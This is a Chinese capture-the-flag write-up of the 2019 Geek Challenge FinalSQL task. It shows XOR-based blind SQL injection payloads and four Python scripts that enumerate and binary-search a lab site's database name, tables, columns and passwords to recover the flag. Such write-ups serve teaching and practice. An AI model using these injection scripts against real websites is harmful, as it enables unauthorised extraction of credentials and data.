[极客大挑战 2019]FinalSQL write-up
(0)

终于到final了

看到这里有一个sql盲注,估计可能是sql盲注的题目

测试一下异或盲注
发现

可以通过^来判断报错与否,从而实现盲注

由图可知当1^1^1时输出为NO!,则先构造payload遍历数据库名长度?id=1^1^(length(database())=i)"当i为数据库名长度时。会输出NO!

import requests;

for i in range(1,20):
    url = "http://69c400f4-b2c8-4309-acfd-7444f4747cf2.node3.buuoj.cn/search.php?id=1^1^(length(database())={0})".format(i)
    html = requests.get(url)
    if "NO!" in html.text:
        print (i)
        input()
        break

最终得到数据库名长度4,然后爆数据库名。可以使用枚举或者二分法。
先使用枚举法

这里要用这个函数来分割数据库名

SUBSTR(str,pos,len);

从pos开始的位置,截取len个字符(空白也算字符)。

需要注意的是:如果pos为1(而不是0),表示从第一个位置开始。

可以用ascii码来枚举,这里的payload是?id= 1^1^(ascii(substr((select(database())),i,1))=j)i为1,2,3,4
脚本如下

import requests;
flag = ""
for i in range(1, 5):
    for j in range(33, 128):
        url = "http://69c400f4-b2c8-4309-acfd-7444f4747cf2.node3.buuoj.cn/search.php?id= 1^1^(ascii(substr((select(database())),{0},1))={1})".format(i,j)
        html = requests.get(url)
        if "NO!" in html.text:
            flag += chr(j)
            print (chr(j))
            break
print(flag)
input()


接下来的过程也是类似的,我打算使用二分法来获取表名
payload?id=1^1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),i,1))<mid)

脚本如下

import requests;
flag = ""
for i in range(1, 1000):
        low=32
        high=128
        mid=(low+high)//2
        while low < high:
            url = "http://fc219441-75b7-4d69-9e1e-557a736fd552.node3.buuoj.cn/search.php?id=1^1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),{0},1))<{1})".format(i,mid)
            html = requests.get(url)
            if "NO!" in html.text:
                high = mid
            else:
                low = mid + 1
            mid = (low + high) // 2
        if mid <= 32 or mid >= 127:
            break
        flag += chr(mid-1)
        print (chr(mid-1))
print(flag)

得到两个表F1naI1y,FlaaaaagO

接下来获取列名payloadid=1^1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),i,1))<mid)

import requests;
flag = ""
for i in range(1, 1000):
        low=32
        high=128
        mid=(low+high)//2
        while low < high:
            url = "http://fc219441-75b7-4d69-9e1e-557a736fd552.node3.buuoj.cn/search.php?id=1^1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),{0},1))<{1})".format(i,mid)
            html = requests.get(url)
            if "NO!" in html.text:
                high = mid
            else:
                low = mid + 1
            mid = (low + high) // 2
        if mid <= 32 or mid >= 127:
            break
        flag += chr(mid-1)
        print (chr(mid-1))
print(flag)

爆表F1naI1y得到id,username,password,看一下password,发现一个问题,爆出来的数据有时候不准。可以多跑几次脚本

payloadid=1^1^(ascii(substr((select(group_concat(password))from(F1naI1y)),i,1))<mid)

脚本如下

import requests;
flag = ""
for i in range(172, 220):
        low=32
        high=128
        mid=(low+high)//2
        while low < high:
            url = "http://fc219441-75b7-4d69-9e1e-557a736fd552.node3.buuoj.cn/search.php?id=1^1^(ascii(substr((select(group_concat(password))from(F1naI1y)),{0},1))<{1})".format(i,mid)
            html = requests.get(url)
            if "NO!" in html.text:
                high = mid
            else:
                low = mid + 1
            mid = (low + high) // 2
        if mid <= 32 or mid >= 127:
            break
        flag += chr(mid-1)
        print (chr(mid-1))
print(flag)

跑了好多次脚本。对照后得到flag

本文为作者silent666发布,未经允许禁止转载!
上一篇 下一篇
评论
暂无评论 >_<
加入评论